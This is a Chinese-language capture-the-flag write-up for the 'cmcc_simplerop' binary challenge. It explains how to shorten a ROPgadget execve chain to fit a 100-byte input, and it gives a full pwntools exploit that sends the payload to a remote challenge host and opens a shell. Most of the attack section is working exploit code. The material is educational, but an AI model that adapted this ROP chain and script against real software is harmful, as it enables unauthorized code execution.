cmcc_simplerop

这题也是静态链接的程序，gadget 充足，可以直接用 ROPgadget 生成 execve 链，但是对比上一题多了一个限制：
image
程序一次最多只读取 100 字节的输入，而 ROPgadget 自动生成的 execve 链本身就有 34 个 dword = 136 字节，再加上 32 字节的栈填充共 168 字节，远超上限，所以 ropchain 必须手工精简。

- Step 5 -- Build the ROP chain

	#!/usr/bin/env python2
	# execve generated by ROPgadget
	#
	# Layout of the generated chain (i386, statically linked target):
	#   1. write "/bin" and "//sh" into .data (0x080ea060 .. 0x080ea067) via
	#      pop edx / pop eax / mov [edx], eax, then store a zero dword at
	#      .data+8 so the string is NUL-terminated;
	#   2. ebx = &"/bin//sh", ecx = edx = .data+8 -- both point at a zero
	#      dword, i.e. an empty NULL-terminated argv / envp array;
	#   3. eax = 11 (SYS_execve on i386), built from xor eax,eax + 11 x inc eax;
	#   4. int 0x80.
	# Size: 34 gadgets x 4 bytes = 136 bytes before any stack padding, which
	# already exceeds this challenge's 100-byte input limit -- that is why the
	# chain is hand-shortened later on this page.

	from struct import pack

	# Padding goes here (ROPgadget leaves the overflow offset to the user)
	p = ''

	p += pack('<I', 0x0806e82a) # pop edx ; ret
	p += pack('<I', 0x080ea060) # @ .data
	p += pack('<I', 0x080bae06) # pop eax ; ret
	p += '/bin'
	p += pack('<I', 0x0809a15d) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x0806e82a) # pop edx ; ret
	p += pack('<I', 0x080ea064) # @ .data + 4
	p += pack('<I', 0x080bae06) # pop eax ; ret
	p += '//sh'
	p += pack('<I', 0x0809a15d) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x0806e82a) # pop edx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8
	p += pack('<I', 0x08054250) # xor eax, eax ; ret
	p += pack('<I', 0x0809a15d) # mov dword ptr [edx], eax ; ret  (NUL terminator for "/bin//sh")
	p += pack('<I', 0x080481c9) # pop ebx ; ret
	p += pack('<I', 0x080ea060) # @ .data  -> ebx = filename
	p += pack('<I', 0x0806e851) # pop ecx ; pop ebx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8  -> ecx = argv (points at a zero dword)
	p += pack('<I', 0x080ea060) # padding without overwrite ebx
	p += pack('<I', 0x0806e82a) # pop edx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8  -> edx = envp (points at a zero dword)
	p += pack('<I', 0x08054250) # xor eax, eax ; ret
	p += pack('<I', 0x0807b27f) # inc eax ; ret
	p += pack('<I', 0x0807b27f) # inc eax ; ret
	p += pack('<I', 0x0807b27f) # inc eax ; ret
	p += pack('<I', 0x0807b27f) # inc eax ; ret
	p += pack('<I', 0x0807b27f) # inc eax ; ret
	p += pack('<I', 0x0807b27f) # inc eax ; ret
	p += pack('<I', 0x0807b27f) # inc eax ; ret
	p += pack('<I', 0x0807b27f) # inc eax ; ret
	p += pack('<I', 0x0807b27f) # inc eax ; ret
	p += pack('<I', 0x0807b27f) # inc eax ; ret
	p += pack('<I', 0x0807b27f) # inc eax ; ret  (11 increments -> eax = 0xb = SYS_execve)
	p += pack('<I', 0x080493e1) # int 0x80

这是 ROPgadget --ropchain 自动生成的 ropchain，直接用会超过 100 字节的输入上限，需要在此基础上精简。
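# Hand-shortened execve("/bin/sh", NULL, NULL) chain that fits the 100-byte read.
#
# Compared with the ROPgadget output above it saves bytes in three ways:
#   * the second store writes "/sh\x00", so the NUL terminator arrives with the
#     string and the separate xor/mov zero-write of .data+8 is gone;
#   * one gadget loads edx, ecx and ebx instead of three separate pops;
#   * eax = 0xb comes from a single pop instead of xor + 11 x inc.
# Embedding a raw 0x00 in the input only works because the target consumes the
# payload with a plain read(); a gets/strcpy-style read would stop at the NUL.
# Byte literals keep this valid on both Python 2 and Python 3: pack() returns
# bytes, and bytes + str raises TypeError on Python 3.
from struct import pack

MAX_INPUT = 100       # bytes the target reads, per the analysis above
OFFSET = 0x1c + 4     # buffer -> saved ebp is 0x1c (per the writeup); +4 skips ebp to the return address
DATA = 0x080ea060     # writable .data, used as the "/bin/sh" buffer

p = b'a' * OFFSET

p += pack('<I', 0x0806e82a)  # pop edx ; ret
p += pack('<I', DATA)        # @ .data
p += pack('<I', 0x080bae06)  # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x0809a15d)  # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e82a)  # pop edx ; ret
p += pack('<I', DATA + 4)    # @ .data + 4
p += pack('<I', 0x080bae06)  # pop eax ; ret
p += b'/sh\x00'              # NUL included -> .data now holds "/bin/sh\0"
p += pack('<I', 0x0809a15d)  # mov dword ptr [edx], eax ; ret
# presumably `pop edx ; pop ecx ; pop ebx ; ret` -- one byte before the
# `pop ecx ; pop ebx ; ret` at 0x0806e851 in the ROPgadget chain; confirm with ROPgadget
p += pack('<I', 0x0806e850)
p += pack('<I', 0)           # edx = NULL  (envp)
p += pack('<I', 0)           # ecx = NULL  (argv)
p += pack('<I', DATA)        # ebx = &"/bin/sh" (filename)
p += pack('<I', 0x080bae06)  # pop eax ; ret
p += pack('<I', 0xb)         # eax = 11 = SYS_execve (i386)
p += pack('<I', 0x080493e1)  # int 0x80

# Anything beyond MAX_INPUT is never read by the target, so a longer chain
# would be silently truncated -- fail loudly instead.
if len(p) > MAX_INPUT:
    raise ValueError('payload is %d bytes, limit is %d' % (len(p), MAX_INPUT))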
这是我们修改后的 ropchain，核心思想有三点：(1) 用一个 gadget 一次性 pop edx、ecx、ebx（0x0806e850，应为 `pop edx ; pop ecx ; pop ebx ; ret`，紧挨着 ROPgadget 链里 0x0806e851 的 `pop ecx ; pop ebx ; ret`，建议用 ROPgadget 确认），省掉三次单独的 pop；(2) 第二次写入直接写 `/sh\x00`，字符串结尾的 NUL 随字符串一起写入，省掉单独清零 .data+8 的 `xor eax, eax` + `mov` 两个 gadget（前提是程序用 read() 原样读入，输入中的 \x00 不会截断）；(3) 用一次 `pop eax ; ret` 直接放入 0xb（execve 系统调用号），代替 `xor eax, eax` 加 11 个 `inc eax`。这样就可以减少很多字节的输入。 参考博客 https://blog.csdn.net/Y_peak/article/details/114893593 。另外这题的偏移量和上一题不同：缓冲区到 saved ebp 的偏移是 0x1c，再加 4 字节 ebp 才到返回地址，所以填充 0x1c + 4 = 32 字节（'a'*32）。最终 payload 恰好 100 字节，正好卡在读取上限上。最终 exp：
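from pwn import *
from struct import pack

# Final exploit for cmcc_simplerop: 32 bytes of padding plus a 68-byte
# execve("/bin/sh", NULL, NULL) ROP chain -- exactly the 100 bytes the target
# reads. Byte literals keep the script valid on both Python 2 and Python 3
# (pack() returns bytes; mixing bytes and str raises TypeError on Python 3).

MAX_INPUT = 100       # bytes the target reads, per the analysis above
OFFSET = 0x1c + 4     # buffer -> saved ebp is 0x1c (per the writeup); +4 skips ebp to the return address
DATA = 0x080ea060     # writable .data, used as the "/bin/sh" buffer

# `python exp.py LOCAL` runs against ./simplerop; otherwise use the remote instance.
if args.LOCAL:
    io = process('./simplerop')
else:
    io = remote('node4.buuoj.cn', 28306)
io.recvuntil(b':')

p = b'a' * OFFSET

p += pack('<I', 0x0806e82a)  # pop edx ; ret
p += pack('<I', DATA)        # @ .data
p += pack('<I', 0x080bae06)  # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x0809a15d)  # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e82a)  # pop edx ; ret
p += pack('<I', DATA + 4)    # @ .data + 4
p += pack('<I', 0x080bae06)  # pop eax ; ret
p += b'/sh\x00'              # NUL included -> .data now holds "/bin/sh\0" (needs a raw read() on the target side)
p += pack('<I', 0x0809a15d)  # mov dword ptr [edx], eax ; ret
# presumably `pop edx ; pop ecx ; pop ebx ; ret` -- one byte before the
# `pop ecx ; pop ebx ; ret` at 0x0806e851 in the ROPgadget chain; confirm with ROPgadget
p += pack('<I', 0x0806e850)
p += pack('<I', 0)           # edx = NULL  (envp)
p += pack('<I', 0)           # ecx = NULL  (argv)
p += pack('<I', DATA)        # ebx = &"/bin/sh" (filename)
p += pack('<I', 0x080bae06)  # pop eax ; ret
p += pack('<I', 0xb)         # eax = 11 = SYS_execve (i386)
p += pack('<I', 0x080493e1)  # int 0x80

# Report and check the size *before* sending: the original printed it after
# interactive(), i.e. only once the shell session ended, which is useless for
# debugging. Anything past MAX_INPUT is never read by the target and the chain
# would be silently truncated.
print(hex(len(p)))
if len(p) > MAX_INPUT:
    raise ValueError('payload is %d bytes, limit is %d' % (len(p), MAX_INPUT))

io.send(p)
io.interactive()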